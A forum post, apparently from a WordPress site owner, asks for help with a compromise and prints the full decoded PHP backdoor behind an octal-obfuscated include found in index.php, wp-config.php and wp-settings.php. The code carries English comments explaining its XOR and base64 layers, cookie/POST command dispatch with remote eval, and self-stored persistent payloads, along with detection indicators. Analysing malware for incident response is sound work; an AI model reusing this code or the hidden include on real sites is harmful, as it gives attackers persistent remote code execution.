我的wordpress网站最近遭到黑客攻击。经过研究,我发现有3个文件被感染:
index.php、wp-config.php、wp-settings.php，它们都包含以下代码:
@include "\\057h\\157m\\145/mywebsite/\\160u\\142l\\151c\\137h\\164m\\154/\\167p\\055c\\157n\\164e\\156t\\057c\\141c\\150e\\057a\\154l\\057.\\062d\\061c\\061b\\144d\\056i\\143o";
解码这些八进制转义字符后可以看出，它试图包含一个名为 `.2d1c1bdd.ico` 的文件。该文件实际上就是恶意软件的主体代码，只是用简单的 PHP 函数(如 urlencode)做了编码。对其解码后得到如下内容:
<?php
// Run-once guards. The backdoor abuses defined()/define() on names that look
// like PHP functions ('stream_context_create ', 'file_put_contents ' — note the
// trailing space) as markers, so the body executes at most once per request
// even if the file is included from several infected entry points.
if (!defined(\'stream_context_create \')) {
define(\'stream_context_create \', 1);
// Silence every error channel and lift the time limits: nothing is logged and
// a long-running command is not interrupted.
@ini_set(\'error_log\', null);
@ini_set(\'log_errors\', 0);
@ini_set(\'max_execution_time\', 0);
@error_reporting(0);
@set_time_limit(0);
if (!defined("PHP_EOL")) {
define("PHP_EOL", "\\n");
}
if (!defined(\'file_put_contents \')) {
define(\'file_put_contents \', 1);
// Hard-coded operator key (a UUID). Every command must carry this exact value
// in its 'ak' field (checked in the request loop at the bottom of the file),
// and it is one of the two XOR layers applied by epyogfrf()/faysby().
// This constant is a reliable indicator for scanning other files on the host.
$lzkplbb = \'aebcf4be-c99f-482f-99ba-2502f326ba8b\';
global $lzkplbb;
/**
 * Hand-rolled base64 decoder, equivalent to base64_decode() — presumably
 * inlined so the recognisable builtin name never appears in the file.
 *
 * @param string $reidlomlbkbcttm base64 text; characters outside the base64
 *   alphabet are stripped first, so whitespace and line breaks are tolerated
 * @return string decoded bytes, or "" when the input is shorter than 4 chars
 */
function jwryleag($reidlomlbkbcttm) {
if (strlen($reidlomlbkbcttm) < 4) {
return "";
}
// Standard alphabet; after array_flip() it maps character => 6-bit value,
// with '=' mapping to 64, which serves as the padding sentinel below.
$vfdlzsgb = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
$rnbfucpt = str_split($vfdlzsgb);
$rnbfucpt = array_flip($rnbfucpt);
$reidloml = 0;
$pghzvmajmpz = "";
$reidlomlbkbcttm = preg_replace("~[^A-Za-z0-9\\+\\/\\=]~", "", $reidlomlbkbcttm);
do {
// Take four 6-bit symbols ...
$emntfw = $rnbfucpt[$reidlomlbkbcttm[$reidloml++]];
$uafvfcjv = $rnbfucpt[$reidlomlbkbcttm[$reidloml++]];
$axokje = $rnbfucpt[$reidlomlbkbcttm[$reidloml++]];
$reidlomlwepon = $rnbfucpt[$reidlomlbkbcttm[$reidloml++]];
// ... and repack them into three 8-bit bytes.
$mgrdvzbs = ($emntfw << 2) | ($uafvfcjv >> 4);
$pwkimdf = (($uafvfcjv & 15) << 4) | ($axokje >> 2);
$xbtgle = (($axokje & 3) << 6) | $reidlomlwepon;
$pghzvmajmpz = $pghzvmajmpz . chr($mgrdvzbs);
// '=' in the third or fourth position is padding: drop the matching byte.
if ($axokje != 64) {
$pghzvmajmpz = $pghzvmajmpz . chr($pwkimdf);
}
if ($reidlomlwepon != 64) {
$pghzvmajmpz = $pghzvmajmpz . chr($xbtgle);
}
// NOTE(review): no length check — an input whose length is not a multiple
// of 4 indexes past the end of the string on the last round; with error
// reporting turned off those lookups presumably just yield 0.
} while ($reidloml < strlen($reidlomlbkbcttm));
return $pghzvmajmpz;
}
// Fallback defined only when the builtin is absent. file_put_contents() has
// existed since PHP 5, so on any current host this branch is dead code.
if (!function_exists(\'file_put_contents\')) {
/**
 * Minimal file_put_contents() replacement.
 *
 * @param string       $yselkrw      path to write
 * @param string|array $pghzvmilkupu data; an array is imploded with no separator
 * @param int|false    $ggsmcp       only the value 8 (FILE_APPEND) is honoured
 *                                   and selects append mode; anything else truncates
 * @return int 0 when the file cannot be opened, otherwise fwrite()'s result
 */
function file_put_contents($yselkrw, $pghzvmilkupu, $ggsmcp = false)
{
$ctbgwps = $ggsmcp == 8 ? \'a\' : \'w\';
$pghzvm = @fopen($yselkrw, $ctbgwps);
if ($pghzvm === false) {
return 0;
} else {
if (is_array($pghzvmilkupu)) {
$pghzvmilkupu = implode($pghzvmilkupu);
}
$lziccbi = fwrite($pghzvm, $pghzvmilkupu);
fclose($pghzvm);
return $lziccbi;
}
}
}
// Same pattern as above: a polyfill for a builtin that every supported PHP
// version already provides.
if (!function_exists(\'file_get_contents\')) {
/**
 * Minimal file_get_contents() replacement: reads the whole file in one fread().
 * No error handling — a missing or unreadable path only produces warnings,
 * which the settings at the top of the file suppress.
 *
 * @param string $aqcfyovb path to read
 * @return string|false file contents
 */
function file_get_contents($aqcfyovb)
{
$tzhboa = fopen($aqcfyovb, "r");
$knhvhvg = fread($tzhboa, filesize($aqcfyovb));
fclose($tzhboa);
return $knhvhvg;
}
}
/**
 * Path of this file (the backdoor itself). __FILE__ can carry a suffix such as
 * "(N) : eval()'d code" when the code is reached through eval/include chains,
 * so everything from the first "(" to the end is stripped — once PHP unescapes
 * "\$" in the double-quoted string the pattern is presumably /\(.*$/.
 *
 * The result is used both as the file to read/write persisted payloads in, and
 * (via md5()) as the marker and XOR key for that payload store.
 *
 * @return string
 */
function syywzq() {
return trim(preg_replace("/\\(.*\\$/", \'\', __FILE__));
}
/**
 * Repeating-key XOR: byte i of the data is XORed with byte (i mod keylen) of
 * the key. XOR is its own inverse, so the same call both "encrypts" and
 * "decrypts". This is obfuscation, not cryptography.
 *
 * NOTE(review): an empty key makes this spin forever — the inner loop exits at
 * once and the outer loop never advances $reidloml.
 *
 * @param string $pghzvmilkupuwtjllzq data bytes
 * @param string $mocxvow             key bytes
 * @return string transformed bytes, same length as the input
 */
function pobfnz($pghzvmilkupuwtjllzq, $mocxvow) {
$reidlomldpgbujw = "";
for ($reidloml = 0; $reidloml < strlen($pghzvmilkupuwtjllzq);) {
// Walk the key from the start again for every block of keylen data bytes.
for ($reidlomlsjdziqx = 0; $reidlomlsjdziqx < strlen($mocxvow) && $reidloml < strlen($pghzvmilkupuwtjllzq); $reidlomlsjdziqx++, $reidloml++) {
$reidlomldpgbujw .= chr(ord($pghzvmilkupuwtjllzq[$reidloml]) ^ ord($mocxvow[$reidlomlsjdziqx]));
}
}
return $reidlomldpgbujw;
}
/**
 * "Decrypt": XOR with the caller's key, then with the global operator key.
 * Used on incoming commands and on the persisted payload store. Because XOR
 * layers commute, this is byte-for-byte the same transform as faysby(); the
 * two names only document direction.
 *
 * @param string $pghzvmilkupuwtjllzq data bytes
 * @param string $mocxvow             per-message key (request field name or md5 of the file path)
 * @return string
 */
function epyogfrf($pghzvmilkupuwtjllzq, $mocxvow) {
global $lzkplbb;
return pobfnz(pobfnz($pghzvmilkupuwtjllzq, $mocxvow), $lzkplbb);
}
/**
 * "Encrypt": XOR with the global operator key, then with the caller's key —
 * the inverse of epyogfrf() (and, XOR being commutative, identical to it).
 *
 * @param string $pghzvmilkupuwtjllzq data bytes
 * @param string $mocxvow             per-message key
 * @return string
 */
function faysby($pghzvmilkupuwtjllzq, $mocxvow) {
global $lzkplbb;
return pobfnz(pobfnz($pghzvmilkupuwtjllzq, $lzkplbb), $mocxvow);
}
/**
 * Load the persisted payload store. The backdoor keeps its "plugins" inside
 * its own file, after a marker line made of the md5 of its own path: the text
 * following the 32-char marker is rawurldecode()d, XOR-decoded with that same
 * md5 and the global key, and unserialize()d into a name => PHP code map.
 *
 * For incident response: a trailing "//<32 hex chars><url-encoded blob>" at
 * the end of the .ico file is where the stored payloads live.
 *
 * @return array<string, string> stored snippets keyed by name; empty when no
 *   marker is present (or the stored data fails to unserialize)
 */
function xlkrcv() {
$reidlomlsjdziqxsgzoe = @file_get_contents(syywzq());
$xzusfija = strpos($reidlomlsjdziqxsgzoe, md5(syywzq()));
if ($xzusfija !== false) {
// Skip the 32-character md5 marker; the rest of the file is the store.
$ytlxxkwa = substr($reidlomlsjdziqxsgzoe, $xzusfija + 32);
$yselkrwuvoqce = @unserialize(epyogfrf(rawurldecode($ytlxxkwa), md5(syywzq())));
} else {
$yselkrwuvoqce = array();
}
return $yselkrwuvoqce;
}
/**
 * Persist the payload store back into this file (the write counterpart of
 * xlkrcv()). The map is serialize()d, XOR-encoded with md5 of the file path and
 * the global key, rawurlencode()d, and either swapped in for the existing blob
 * after the marker or appended as a new "//<md5><blob>" line. The backdoor
 * therefore rewrites itself on every add/remove, which changes the file's
 * hash and mtime — worth keeping in mind when comparing against known samples.
 *
 * NOTE(review): the existing blob is replaced with str_replace(); if it were
 * empty the search string would be "", which presumably leaves the file
 * unchanged.
 *
 * @param array<string, string> $yselkrwuvoqce name => PHP code map
 * @return void
 */
function jtjisw($yselkrwuvoqce) {
$ubfwum = rawurlencode(faysby(@serialize($yselkrwuvoqce), md5(syywzq())));
$reidlomlsjdziqxsgzoe = @file_get_contents(syywzq());
$xzusfija = strpos($reidlomlsjdziqxsgzoe, md5(syywzq()));
if ($xzusfija !== false) {
$reidlomlsjdziqxzvmfh = substr($reidlomlsjdziqxsgzoe, $xzusfija + 32);
$reidlomlsjdziqxsgzoe = str_replace($reidlomlsjdziqxzvmfh, $ubfwum, $reidlomlsjdziqxsgzoe);
} else {
// First write: append the marker as a PHP line comment so the file still parses.
$reidlomlsjdziqxsgzoe = $reidlomlsjdziqxsgzoe . "\\n\\n//" . md5(syywzq()) . $ubfwum;
}
@file_put_contents(syywzq(), $reidlomlsjdziqxsgzoe);
}
/**
 * Store (or overwrite) a named snippet: the base64 payload is decoded and
 * saved into the in-file store, where krtogen() will eval() it on later requests.
 *
 * @param string $yselkrwjhujdy snippet name
 * @param string $micvdqw       base64-encoded PHP source
 * @return void
 */
function wdvuby($yselkrwjhujdy, $micvdqw) {
$yselkrwuvoqce = xlkrcv();
$yselkrwuvoqce[$yselkrwjhujdy] = jwryleag($micvdqw);
jtjisw($yselkrwuvoqce);
}
/**
 * Remove a named snippet from the in-file store and write the store back.
 *
 * @param string $yselkrwjhujdy snippet name
 * @return void
 */
function spgrudzn($yselkrwjhujdy) {
$yselkrwuvoqce = xlkrcv();
unset($yselkrwuvoqce[$yselkrwjhujdy]);
jtjisw($yselkrwuvoqce);
}
/**
 * Execute persisted snippets with eval(). With no argument every stored
 * snippet runs, in store order; with a name only the first matching one runs.
 * Called unconditionally at the end of the file, so stored code executes on
 * every request that reaches this file, for every visitor.
 *
 * @param string|null $yselkrwjhujdy snippet name, or null for all
 * @return void
 */
function krtogen($yselkrwjhujdy = null) {
foreach (xlkrcv() as $vjoavt => $mgfnpuj) {
if ($yselkrwjhujdy) {
if (strcmp($yselkrwjhujdy, $vjoavt) == 0) {
eval($mgfnpuj);
break;
}
} else {
eval($mgfnpuj);
}
}
}
// Command dispatcher: every cookie and every POST field is a candidate command.
// A value is base64 text which, after jwryleag() and epyogfrf() with the field
// name as the per-message key, must unserialize() into an array. The field name
// is arbitrary, so there is no fixed parameter name to block on — detection has
// to look at the response (see the echo below) or at the file itself.
foreach (array_merge($_COOKIE, $_POST) as $rtxoabsk => $pghzvmilkupuwtjllzq) {
$pghzvmilkupuwtjllzq = @unserialize(epyogfrf(jwryleag($pghzvmilkupuwtjllzq), $rtxoabsk));
// Authentication: the decoded command has to carry the hard-coded key in 'ak'
// (loose == comparison). Ordinary cookies and form fields will not decode to
// such an array, so the backdoor stays silent for normal visitors.
if (isset($pghzvmilkupuwtjllzq[\'ak\']) && $lzkplbb == $pghzvmilkupuwtjllzq[\'ak\']) {
if ($pghzvmilkupuwtjllzq[\'a\'] == \'i\') {
// 'i' (info): reply with the PHP version, the backdoor's own version string
// '2.0-1' and the key, as a serialized array, then stop.
$reidloml = array(
\'pv\' => @phpversion(),
\'sv\' => \'2.0-1\',
\'ak\' => $pghzvmilkupuwtjllzq[\'ak\']
);
echo @serialize($reidloml);
exit;
} elseif ($pghzvmilkupuwtjllzq[\'a\'] == \'e\') {
// 'e' (eval): run arbitrary PHP supplied in 'd' — full remote code execution.
eval($pghzvmilkupuwtjllzq[\'d\']);
} elseif ($pghzvmilkupuwtjllzq[\'a\'] == \'plugin\') {
// 'plugin': add ('add', name in 'p', base64 code in 'd') or remove ('rem')
// a snippet in the in-file store; stored snippets run on every request via
// krtogen() below, which is the persistence mechanism.
if ($pghzvmilkupuwtjllzq[\'sa\'] == \'add\') {
wdvuby($pghzvmilkupuwtjllzq[\'p\'], $pghzvmilkupuwtjllzq[\'d\']);
} elseif ($pghzvmilkupuwtjllzq[\'sa\'] == \'rem\') {
spgrudzn($pghzvmilkupuwtjllzq[\'p\']);
}
}
// Every handled command ends by echoing the key and terminating the request.
// A response body consisting solely of that UUID is a usable detection
// signature in web server or WAF logs.
echo $pghzvmilkupuwtjllzq[\'ak\'];
exit();
}
}
// Not a command request: still run all persisted snippets, for every visitor.
krtogen();
}
}
我还在努力理解代码。任何帮助都将不胜感激。